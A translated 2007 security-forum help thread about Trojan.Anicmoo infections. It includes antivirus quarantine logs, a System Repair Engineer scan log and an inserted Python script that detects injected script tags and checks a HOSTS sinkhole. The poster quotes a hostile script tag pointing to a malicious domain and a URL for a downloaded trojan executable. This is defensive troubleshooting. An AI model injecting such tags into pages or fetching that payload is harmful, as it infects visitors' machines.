Rising Kaka Security Forum, Technical Exchange, Anti-virus / Anti-rogue-software board: [Help] About Trojan.Anicmoo and Mytest2.jpg


[Help] About Trojan.Anicmoo and Mytest2.jpg


Over the past couple of days several machines at my workplace have been infected with this one after another. The symptoms are as follows:

Opening some websites (e.g. Sina, MOP, CCID) triggers a warning that a virus was found in the IE cache. Below are a few of the records, from SAV 10.1.5:

====================================================

风险    操作    计数    文件名    风险类型    原始位置    计算机    用户    状态    当前位置    主要操作    次要操作    记录者    操作说明    日期
Trojan.Anicmoo    删除时清理    2    mytest2.jpg    文件    C:\Documents and Settings\Administrator.5C3AD5EE7D454E4\桌面\    5C3AD5EE7D454E4    Administrator    受感染    C:\Documents and Settings\Administrator.5C3AD5EE7D454E4\桌面\    清除安全风险    隔离    自动防护扫描        2007-5-19 17:05:12
Trojan.Anicmoo    部分    2    MyTest2[8].jpg    文件    C:\Documents and Settings\Administrator.5C3AD5EE7D454E4\Local Settings\Temporary Internet Files\Content.IE5\YWX7BL1T\    5C3AD5EE7D454E4    Administrator    受感染    C:\Documents and Settings\Administrator.5C3AD5EE7D454E4\Local Settings\Temporary Internet Files\Content.IE5\YWX7BL1T\    清除安全风险    隔离    自动防护扫描    风险部分删除。    2007-5-19 16:57:10
Trojan.Anicmoo    部分    2    MyTest2[9].jpg    文件    C:\Documents and Settings\Administrator.5C3AD5EE7D454E4\Local Settings\Temporary Internet Files\Content.IE5\YWX7BL1T\    5C3AD5EE7D454E4    Administrator    受感染    C:\Documents and Settings\Administrator.5C3AD5EE7D454E4\Local Settings\Temporary Internet Files\Content.IE5\YWX7BL1T\    清除安全风险    隔离    自动防护扫描    风险部分删除。    2007-5-19 16:57:03
Trojan.Anicmoo    部分    2    MyTest2[7].jpg    文件    C:\Documents and Settings\Administrator.5C3AD5EE7D454E4\Local Settings\Temporary Internet Files\Content.IE5\YWX7BL1T\    5C3AD5EE7D454E4    Administrator    受感染    C:\Documents and Settings\Administrator.5C3AD5EE7D454E4\Local Settings\Temporary Internet Files\Content.IE5\YWX7BL1T\    清除安全风险    隔离    自动防护扫描    风险部分删除。    2007-5-19 16:51:09
Trojan.Anicmoo    部分    2    MyTest2[5].jpg    文件    C:\Documents and Settings\Administrator.5C3AD5EE7D454E4\Local Settings\Temporary Internet Files\Content.IE5\YWX7BL1T\    5C3AD5EE7D454E4    Administrator    受感染    C:\Documents and Settings\Administrator.5C3AD5EE7D454E4\Local Settings\Temporary Internet Files\Content.IE5\YWX7BL1T\    清除安全风险    隔离    自动防护扫描    风险部分删除。    2007-5-19 16:51:03

===================================================


A full-disk scan found no virus. I used Autoruns to disable the unverified startup entries and rebooted into Safe Mode, but opening the websites still triggers the alert.

Analyzing the code of the cached web page, I found that this line had been added to the page source:
<script src=http://16a.us/2.js></script>
After downloading that script I found that what it does when run is exactly to download the mytest2.jpg virus from before. The cache also holds Vernum.js and New[1].js from the same site; running them has no (visible) effect.
Analyzing mytest2.jpg (forgive me, I opened it in Notepad), it contains a command to download the file htTP://16a.us/oK/svchost.exe. I downloaded that file (23 KB) but did not dare run it, in case it turns out to be another Panda...

Moreover, visiting the same pages on other, healthy machines shows no virus, and the page source has no such inserted code. If I copy the page from another machine to the infected machine and open it there, the page is not modified either.

Switching to Firefox and resetting Winsock did not help; the problem remains.

I suspect some system module has been hijacked and is tampering with the HTTP-protocol API, stamping that code onto every downloaded web page?

I tried Norton and Kaspersky; neither found a virus.

For now the only thing I have is mapping the 16a.us domain to the local machine in the HOSTS file, but after that change some web pages display incorrectly.

I have not yet found an effective solution.
Hoping an expert can help solve this!!! Thanks!!

Testing that virus program at http://www.virustotal.com/en/indexf.html gives the result:

suspicious, a worm with trojan characteristics... another Panda -_- ugh
Last edited 2007-05-19 19:02:43
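The two checks the post describes, locating an externally hosted script tag in a cached page and comparing the infected machine's copy with a clean machine's, written up as an added Python example that is not part of the original post. The page host, the sample HTML and the HOSTS contents are constructed here; the only real indicator used is the 16a.us tag quoted above.

```python
import re
import difflib
from urllib.parse import urlparse

# Constructed sample: a page as saved from the IE cache of an infected machine,
# carrying the tag the post found: <script src=http://16a.us/2.js></script>
INFECTED_HTML = """<html><head><title>News</title>
<script src="http://www.example-news.test/js/common.js"></script>
</head><body><p>Headline</p>
<script src=http://16a.us/2.js></script>
</body></html>"""

# Constructed sample: the same page as saved on a clean machine
CLEAN_HTML = """<html><head><title>News</title>
<script src="http://www.example-news.test/js/common.js"></script>
</head><body><p>Headline</p>
</body></html>"""

# Constructed sample of the HOSTS-file workaround the post applied
HOSTS_SAMPLE = """# constructed HOSTS file
127.0.0.1    localhost
127.0.0.1    16a.us   # sinkholed by the admin
"""

# src attribute of <script> tags, quoted or not (the injected tag is unquoted)
SCRIPT_SRC_RE = re.compile(r'<script[^>]*\ssrc\s*=\s*["\']?([^\s"\'>]+)', re.IGNORECASE)


def script_sources(html):
    """Every script src in document order."""
    return SCRIPT_SRC_RE.findall(html)


def external_scripts(html, page_host):
    """Scripts loaded from a host that is neither page_host nor one of its subdomains."""
    page_host = page_host.lower()
    flagged = []
    for src in script_sources(html):
        host = urlparse(src).hostname  # None for relative URLs, i.e. same origin
        if host is None:
            continue
        if host == page_host or host.endswith("." + page_host):
            continue
        flagged.append(src)
    return flagged


def injected_lines(clean_html, infected_html):
    """Lines present only in the infected copy: the comparison the post made between machines."""
    diff = difflib.unified_diff(clean_html.splitlines(), infected_html.splitlines(),
                                lineterm="", n=0)
    return [line[1:] for line in diff if line.startswith("+") and not line.startswith("+++")]


def sinkholed_hosts(hosts_text):
    """Hostnames a HOSTS file maps to a loopback or null address."""
    blocked = set()
    for line in hosts_text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) >= 2 and fields[0] in ("127.0.0.1", "0.0.0.0", "::1"):
            blocked.update(name.lower() for name in fields[1:])
    return blocked


def unblocked_external_scripts(html, page_host, hosts_text):
    """External scripts the HOSTS workaround does not cover; these would still load."""
    blocked = sinkholed_hosts(hosts_text)
    return [src for src in external_scripts(html, page_host)
            if urlparse(src).hostname not in blocked]


if __name__ == "__main__":
    print("external:", external_scripts(INFECTED_HTML, "example-news.test"))
    print("injected:", injected_lines(CLEAN_HTML, INFECTED_HTML))
    print("not covered by HOSTS:",
          unblocked_external_scripts(INFECTED_HTML, "example-news.test", HOSTS_SAMPLE))
```

Running the same functions over every .htm file under Temporary Internet Files is how one would confirm that the tag is being added to pages from many sites, as the post suspects, rather than served by one of them.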

Analysis results



[CODE]

2007-05-19,17:43:54

System Repair Engineer 2.4.12.806
Smallfrogs (http://www.KZTechs.com)

Windows XP Professional Service Pack 2 (Build 2600) - 管理权限用户 - 完整功能

以下内容被选中:
  所有的启动项目(包括注册表、启动文件夹、服务等)
  浏览器加载项
  正在运行的进程(包括进程模块信息)
  文件关联
  Winsock 提供者
  Autorun.inf
  HOSTS 文件


启动项目
注册表
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
  <ctfmon.exe><C:\WINDOWS\system32\ctfmon.exe> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
  <ccApp><"C:\Program Files\Common Files\Symantec Shared\ccApp.exe"> [(Verified)Symantec Corporation]
  <IMSCMig><C:\PROGRA~1\COMMON~1\MICROS~1\IME\IMSC40A\IMSCMIG.EXE /Preload> [(Verified)Microsoft Corporation]
  <vptray><C:\PROGRA~1\SYMANT~2\\vptray.exe> [(Verified)Symantec Corporation]
  <360Safetray><C:\Program Files\360safe\safemon\360Tray.exe /start> [奇虎网]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
  <shell><Explorer.exe> [(Verified)Microsoft Windows Publisher]
  <Userinit><C:\WINDOWS\system32\userinit.exe,> [(Verified)Microsoft Windows Publisher]
  <UIHost><logonui.exe> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
  <{AEB6717E-7E19-11d0-97EE-00C04FD91972}><shell32.dll> [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
  <WebCheck><%SystemRoot%\system32\webcheck.dll> [(Verified)Microsoft Windows Publisher]
  <SysTray><C:\WINDOWS\system32\stobject.dll> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt32chain]
  <WinlogonNotify: crypt32chain><crypt32.dll> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptnet]
  <WinlogonNotify: cryptnet><cryptnet.dll> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cscdll]
  <WinlogonNotify: cscdll><cscdll.dll> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ScCertProp]
  <WinlogonNotify: ScCertProp><wlnotify.dll> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\Schedule]
  <WinlogonNotify: Schedule><wlnotify.dll> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\sclgntfy]
  <WinlogonNotify: sclgntfy><sclgntfy.dll> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\SensLogn]
  <WinlogonNotify: SensLogn><WlNotify.dll> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\termsrv]
  <WinlogonNotify: termsrv><wlnotify.dll> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\wlballoon]
  <WinlogonNotify: wlballoon><wlnotify.dll> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}]
  <Microsoft Windows Media Player><C:\WINDOWS\inf\unregmp2.exe /ShowWMP> [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}]
  <Windows 桌面更新><regsvr32.exe /s /n /i:U shell32.dll> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}]
  <Internet Explorer 6><%SystemRoot%\system32\ie4uinit.exe> [(Verified)Microsoft Windows Publisher]

==================================
启动文件夹
N/A

==================================
服务
[ACU Configuration Service / ACS][Stopped/Manual Start]
<C:\WINDOWS\system32\acs.exe><N/A>
[Ati HotKey Poller / Ati HotKey Poller][Running/Auto Start]
<C:\WINDOWS\system32\Ati2evxx.exe><ATI Technologies Inc.>
[Symantec Event Manager / ccEvtMgr][Running/Auto Start]
<"C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe"><Symantec Corporation>
[SMS 代理主机 / CcmExec][Running/Auto Start]
<C:\WINDOWS\system32\CCM\CcmExec.exe><Microsoft Corporation>
[Symantec Settings Manager / ccSetMgr][Running/Auto Start]
<"C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe"><Symantec Corporation>
[Symantec AntiVirus Definition Watcher / DefWatch][Running/Auto Start]
<"C:\Program Files\Symantec AntiVirus\DefWatch.exe"><Symantec Corporation>
[Intel(R) PROSet/Wireless Event Log / EvtEng][Stopped/Disabled]
<C:\Program Files\Intel\Wireless\Bin\EvtEng.exe><Intel Corporation>
[Human Interface Device Access / HidServ][Stopped/Disabled]
<C:\WINDOWS\System32\svchost.exe -k netsvcs-->%SystemRoot%\System32\hidserv.dll><N/A>
[ThinkPad PM Service / IBMPMSVC][Running/Auto Start]
<C:\WINDOWS\system32\ibmpmsvc.exe><>
[InstallDriver Table Manager / IDriverT][Stopped/Manual Start]
<"C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe"><Macrovision Corporation>
[LiveUpdate / LiveUpdate][Stopped/Manual Start]
<"C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE"><Symantec Corporation>
[Lotus Notes Single Logon / Lotus Notes Single Logon][Running/Auto Start]
<"C:\Program Files\lotus\notes\nslsvice.exe"><IBM Corp>
[McAfee Framework Service / McAfeeFramework][Running/Auto Start]
<"C:\Program Files\McAfee\Common Framework\FrameworkService.exe" /ServiceStart><McAfee, Inc.>
[Multi-user Cleanup Service / Multi-user Cleanup Service][Running/Auto Start]
<"C:\Program Files\lotus\notes\ntmulti.exe"><IBM Corp>
[Symantec 系统中心搜索服务 / NSCTOP][Running/Auto Start]
<C:\PROGRA~1\Symantec\SYMANT~1\NSCTOP.EXE><Symantec Corporation>
[Intel(R) PROSet/Wireless Registry Service / RegSrvc][Running/Auto Start]
<C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe><Intel Corporation>
[Intel(R) PROSet/Wireless Service / S24EventMonitor][Stopped/Auto Start]
<C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe><Intel Corporation>
[SavRoam / SavRoam][Running/Auto Start]
<"C:\Program Files\Symantec AntiVirus\SavRoam.exe"><symantec>
[Symantec Network Drivers Service / SNDSrvc][Stopped/Manual Start]
<"C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe"><Symantec Corporation>
[SoundMAX Agent Service / SoundMAX Agent Service (default)][Running/Auto Start]
<C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe><Analog Devices, Inc.>
[Symantec SPBBCSvc / SPBBCSvc][Running/Auto Start]
<"C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exe"><Symantec Corporation>
[Symantec AntiVirus / Symantec AntiVirus][Running/Auto Start]
<"C:\Program Files\Symantec AntiVirus\Rtvscan.exe"><Symantec Corporation>
[TomDemoService / TomDemoService][Stopped/Disabled]
<C:\CONFIG.EXE><N/A>
[IBM KCU Service / TpKmpSVC][Stopped/Disabled]
<C:\WINDOWS\system32\TpKmpSVC.exe><N/A>
[SMS Remote Control Agent / Wuser32][Running/Auto Start]
<C:\WINDOWS\system32\CCM\CLICOMP\RemCtrl\Wuser32.exe><Microsoft Corporation>

==================================
驱动程序
[aeaudio / aeaudio][Running/Manual Start]
<system32\drivers\aeaudio.sys><Andrea Electronics Corporation>
[AEGIS Protocol (IEEE 802.1x) v3.6.0.0 / AegisP][Stopped/Disabled]
<system32\DRIVERS\AegisP.sys><Meetinghouse Data Communications>
[AntiARP NDIS Protocol Driver / AntiArpNdisProt][Running/Auto Start]
<system32\DRIVERS\AntiArpNdisProt.sys><Windows (R) 2000 DDK provider>
[ati2mtag / ati2mtag][Running/Manual Start]
<system32\DRIVERS\ati2mtag.sys><ATI Technologies Inc.>
[Broadcom NetXtreme Gigabit Ethernet / b57w2k][Running/Manual Start]
<system32\DRIVERS\b57xp32.sys><Broadcom Corporation>
[Symantec Eraser Control driver / eeCtrl][Running/System Start]
<\??\C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys><Symantec Corporation>
[EraserUtilRebootDrv / EraserUtilRebootDrv][Running/Manual Start]
<\??\C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys><Symantec Corporation>
[HSFHWICH / HSFHWICH][Running/Manual Start]
<system32\DRIVERS\HSFHWICH.sys><Conexant Systems, Inc.>
[HSF_DPV / HSF_DPV][Running/Manual Start]
<system32\DRIVERS\HSF_DPV.sys><Conexant Systems, Inc.>
[IBMPMDRV / IBMPMDRV][Running/Manual Start]
<system32\DRIVERS\ibmpmdrv.sys><Lenovo.>
[jbridgep / jbridgep][Stopped/Disabled]
<\??\C:\DOCUME~1\ADMINI~1.5C3\LOCALS~1\Temp\jbridgep.sys><N/A>
[mdmxsdk / mdmxsdk][Running/Auto Start]
<system32\DRIVERS\mdmxsdk.sys><Conexant>
[NAVENG / NAVENG][Running/Manual Start]
<\??\C:\PROGRA~1\COMMON~1\SYMANT~1\VIRUSD~1\20070518.019\naveng.sys><Symantec Corporation>
[NAVEX15 / NAVEX15][Running/Manual Start]
<\??\C:\PROGRA~1\COMMON~1\SYMANT~1\VIRUSD~1\20070518.019\navex15.sys><Symantec Corporation>
[npkcrypt / npkcrypt][Running/Auto Start]
<\??\D:\Program Files\Tencent\QQ\npkcrypt.sys><INCA Internet Co., Ltd.>
[NSC Infrared Device Driver / NSCIRDA][Running/Manual Start]
<system32\DRIVERS\nscirda.sys><National Semiconductor Corporation>
[oreans32 / oreans32][Stopped/Disabled]
<\??\C:\WINDOWS\system32\drivers\oreans32.sys><N/A>
[SMS Process Event Driver / prepdrvr][Running/Manual Start]
<\??\C:\WINDOWS\system32\CCM\prepdrv.sys><Microsoft Corporation>
[Direct Parallel Link Driver / Ptilink][Running/Manual Start]
<system32\DRIVERS\ptilink.sys><Parallel Technologies, Inc.>
[WLAN 传输 / s24trans][Running/Auto Start]
<system32\DRIVERS\s24trans.sys><Intel Corporation>
[SAVRT / SAVRT][Running/Manual Start]
<\??\C:\Program Files\Symantec AntiVirus\savrt.sys><Symantec Corporation>
[SAVRTPEL / SAVRTPEL][Running/System Start]
<\??\C:\Program Files\Symantec AntiVirus\Savrtpel.sys><Symantec Corporation>
[Secdrv / Secdrv][Running/Auto Start]
<system32\DRIVERS\secdrv.sys><Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.>
[smwdm / smwdm][Running/Manual Start]
<system32\drivers\smwdm.sys><Analog Devices, Inc.>
[SPBBCDrv / SPBBCDrv][Running/System Start]
<\??\C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCDrv.sys><Symantec Corporation>
[sptd / sptd][Stopped/Disabled]
<System32\Drivers\sptd.sys><Duplex Secure Ltd.>
[SymEvent / SymEvent][Running/Manual Start]
<\??\C:\Program Files\Symantec\SYMEVENT.SYS><Symantec Corporation>
[SYMREDRV / SYMREDRV][Running/Manual Start]
<\SystemRoot\System32\Drivers\SYMREDRV.SYS><Symantec Corporation>
[SYMTDI / SYMTDI][Running/System Start]
<\SystemRoot\System32\Drivers\SYMTDI.SYS><Symantec Corporation>
[Synaptics TouchPad Driver / SynTP][Running/Manual Start]
<system32\DRIVERS\SynTP.sys><Synaptics, Inc.>
[TCP/IP Protocol Driver / Tcpip][Running/System Start]
<system32\DRIVERS\tcpip.sys><Microsoft Corporation>
[TPPWRIF / TPPWRIF][Stopped/Disabled]
<System32\drivers\Tppwrif.sys><N/A>
[Conexant Setup API / UIUSys][Stopped/Disabled]
<system32\drivers\UIUSys.sys><N/A>
[VCD VNC Virtual Network Adapter / vcddev][Stopped/Manual Start]
<system32\DRIVERS\vcdvnic.sys><VNN B.J.>
[用于 Windows XP 的英特尔(R) PRO/无线 2200BG 网络连接驱动程序 / w29n51][Stopped/Manual Start]
<system32\DRIVERS\w29n51.sys><Intel? Corporation>
[winachsf / winachsf][Running/Manual Start]
<system32\DRIVERS\HSF_CNXT.sys><Conexant Systems, Inc.>
[xAntiArpSpoof Service / xAntiArp][Running/Manual Start]
<system32\DRIVERS\xAntiArp.sys><Windows (R) 2000 DDK provider>


==================================
浏览器加载项
[AcroIEHlprObj Class]
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} <C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll, Adobe Systems Incorporated>
[Java Plug-in 1.5.0_11]
{08B0E5C0-4FCB-11CF-AAA5-00401C608501} <C:\Program Files\Java\jre1.5.0_11\bin\ssv.dll, N/A>
[AcroIEHlprObj Class]
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} <C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll, Adobe Systems Incorporated>
[Web Browser Applet Control]
{08B0E5C0-4FCB-11CF-AAA5-00401C608501} <C:\WINDOWS\system32\msjava.dll, Microsoft Corporation>
[CKAVWebScan Object]
{0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} <C:\WINDOWS\system32\Kaspersky Lab\Kaspersky Online Scanner Pro\kavwebscan.dll, Kaspersky Lab>
[PeerDraw Class]
{10072CEC-8CC1-11D1-986E-00A0C955B42E} <C:\Program Files\Common Files\Microsoft Shared\VGX\vgx.dll, Microsoft Corporation>
[Windows Genuine Advantage]
{17492023-C23A-453E-A040-C7C580BBF700} <C:\WINDOWS\system32\LegitCheckControl.dll, Microsoft? Corporation>
[iTrusPTA Class]
{1E0DFFCF-27FF-4574-849B-55007349FEDA} <C:\WINDOWS\system32\aliedit\pta.dll, >
[Windows Media Player]
{22D6F312-B0F6-11D0-94AB-0080C74C7E95} <C:\WINDOWS\system32\wmpdxm.dll, Microsoft Corporation>
[HTML Document]
{25336920-03F9-11CF-8FD0-00AA00686F13} <%SystemRoot%\system32\mshtml.dll, N/A>
[DHTML Edit Control Safe for Scripting]
{2D360201-FFF5-11D1-8D03-00A0C959BC0A} <C:\WINDOWS\system32\Dhtmled.ocx, Microsoft Corporation>
[IETag Factory]
{38481807-CA0E-42D2-BF39-B33AF135CC4D} <C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\IETAG.DLL, Microsoft Corporation>
[EditCtrl Class]
{488A4255-3236-44B3-8F27-FA1AECAA8844} <C:\WINDOWS\system32\aliedit\aliedit.dll, >
[HHCtrl Object]
{52A2AAAE-085D-4187-97EA-8C30DB990436} <C:\WINDOWS\system32\hhctrl.ocx, Microsoft Corporation>
[Shell Name Space]
{55136805-B2DE-11D1-B9F2-00A0C98BC547} <%SystemRoot%\system32\shdocvw.dll, N/A>
[CKAVReportCtrl Object]
{6117669B-8C2D-41FA-A6D9-9E484B999CF0} <C:\WINDOWS\system32\Kaspersky Lab\Kaspersky Online Scanner Pro\kavwebscan.dll, Kaspersky Lab>
[WUWebControl Class]
{6414512B-B978-451D-A0D8-FCFDF33E833C} <C:\WINDOWS\system32\wuweb.dll, Microsoft Corporation>
[Windows Media Player]
{6BF52A52-394A-11D3-B153-00C04F79FAA6} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[WangWangObj Class]
{6E213FC7-DD5A-4115-B7E6-D4C7838C361E} <C:\Program Files\淘宝网\淘宝旺旺\WangWangX4.dll, 阿里软件(中国)有限公司>
[MUWebControl Class]
{6E32070A-766D-4EE6-879C-DC1FA91D2FC3} <C:\WINDOWS\system32\muweb.dll, Microsoft Corporation>
[Microsoft Web 浏览器]
{8856F961-340A-11D0-A96B-00C04FD705A2} <C:\WINDOWS\system32\shdocvw.dll, Microsoft Corporation>
[Java Plug-in 1.5.0_11]
{8AD9C840-044E-11D1-B3E9-00805F499D93} <C:\Program Files\Java\jre1.5.0_11\bin\ssv.dll, N/A>
[WLCtnCtrl Class]
{A8BE6022-A0E7-49D9-9E51-7CBFAC800CFB} <C:\Program Files\MSN Cartoon (Beta)\CartoonCtrl.dll, Microsoft Corp.>
[Microsoft Scriptlet Component]
{AE24FDAE-03C6-11D1-8B76-0080C744F389} <C:\WINDOWS\system32\mshtml.dll, Microsoft Corporation>
[SearchAssistantOC]
{B45FF030-4447-11D2-85DE-00C04FA35C89} <%SystemRoot%\system32\shdocvw.dll, N/A>
[RDS.DataSpace]
{BD96C556-65A3-11D0-983A-00C04FC29E36} <C:\Program Files\Common Files\System\MSADC\msadco.dll, Microsoft Corporation>
[AUDIO__MID Moniker Class]
{CD3AFA74-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[AUDIO__MP3 Moniker Class]
{CD3AFA76-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[AUDIO__WAV Moniker Class]
{CD3AFA7B-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[AUDIO__X_MS_WMA Moniker Class]
{CD3AFA84-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[VIDEO__X_MS_ASF Moniker Class]
{CD3AFA8F-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[VIDEO__X_MS_WMV Moniker Class]
{CD3AFA94-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[RealPlayer G2 Control]
{CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA} <C:\WINDOWS\system32\rmoc3260.dll, RealNetworks, Inc.>
[Shockwave Flash Object]
{D27CDB6E-AE6D-11CF-96B8-444553540000} <C:\WINDOWS\system32\Macromed\Flash\Flash9b.ocx, Adobe Systems, Inc.>
[WebBasedClientInstall Class]
{D30CA0FD-1CA0-11D4-AC78-006008A9A8BC} <C:\WINDOWS\Downloaded Program Files\WebInst.Dll, Symantec Corporation>
[Domino Web Access 7 Control]
{E008A543-CEFB-4559-912F-C27C2B89F13B} <C:\WINDOWS\Downloaded Program Files\dwa7W.dll, IBM Corporation>
[上传到QQ网络硬盘]
<D:\Program Files\Tencent\QQ\AddToNetDisk.htm, N/A>
[使用迅雷下载]
<C:\Program Files\Thunder Network\Thunder\Program\GetUrl.htm, N/A>
[使用迅雷下载全部链接]
<C:\Program Files\Thunder Network\Thunder\Program\GetAllUrl.htm, N/A>
[导出到 Microsoft Office Excel(&X)]
<res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000, N/A>
[添加到QQ自定义面板]
<D:\Program Files\Tencent\QQ\AddPanel.htm, N/A>
[添加到QQ表情]
<D:\Program Files\Tencent\QQ\AddEmotion.htm, N/A>
[用QQ彩信发送该图片]
<D:\Program Files\Tencent\QQ\SendMMS.htm, N/A>
[转换为 Adobe PDF]
<res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html, N/A>
[转换为现有 PDF]
<res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html, N/A>
[转换选定的链接为 Adobe PDF]
<res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html, N/A>
[转换选定的链接为现有 PDF]
<res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html, N/A>
[转换选项为 Adobe PDF]
<res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html, N/A>
[转换选项为现有 PDF]
<res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html, N/A>
[转换链接目标为 Adobe PDF]
<res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html, N/A>
[转换链接目标为现有 PDF]
<res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html, N/A>

==================================
正在运行的进程
[PID: 444][\SystemRoot\System32\smss.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 492][\??\C:\WINDOWS\system32\csrss.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1688][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
  [C:\WINDOWS\system32\UxTheme.dll] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
  [C:\Program Files\Adobe\Acrobat 7.0\ActiveX\PDFShell.dll] [Adobe Systems, Inc., 7.0.0.0]
  [C:\Program Files\Adobe\Acrobat 7.0\ActiveX\PDFShell.CHS] [Adobe Systems, Inc., 7.0.0.0]
  [C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll] [Adobe Systems Incorporated, 7.0.0.2004121400]
  [C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
  [C:\Program Files\WinRAR\rarext.dll] [N/A, ]
  [C:\Program Files\Common Files\Symantec Shared\SSC\vpshell2.dll] [Symantec Corporation, 10.1.5.5000]
  [D:\Program Files\Tencent\QQ\qdshm.dll] [, 1, 0, 101, 20]
  [D:\Program Files\Tencent\QQ\MFC42.DLL] [Microsoft Corporation, 6.00.8665.0]
  [C:\Program Files\Adobe\Acrobat 7.0\Acrobat Elements\ContextMenu.dll] [Adobe Systems Inc., 7.0.0.2004121400\0]
  [C:\WINDOWS\system32\MFC71.DLL] [Microsoft Corporation, 7.10.3077.0]
  [C:\WINDOWS\system32\MSVCP71.dll] [Microsoft Corporation, 7.10.3077.0]
  [C:\WINDOWS\system32\MFC71CHS.DLL] [Microsoft Corporation, 7.10.3077.0]
  [C:\Program Files\Adobe\Acrobat 7.0\Acrobat Elements\ContextMenu.chs] [Adobe Systems Inc., 7.0.0.2004121400\0]
[PID: 344][C:\Program Files\Common Files\Symantec Shared\ccApp.exe] [Symantec Corporation, 104.0.11.1]
  [C:\WINDOWS\system32\MSVCP71.dll] [Microsoft Corporation, 7.10.3077.0]
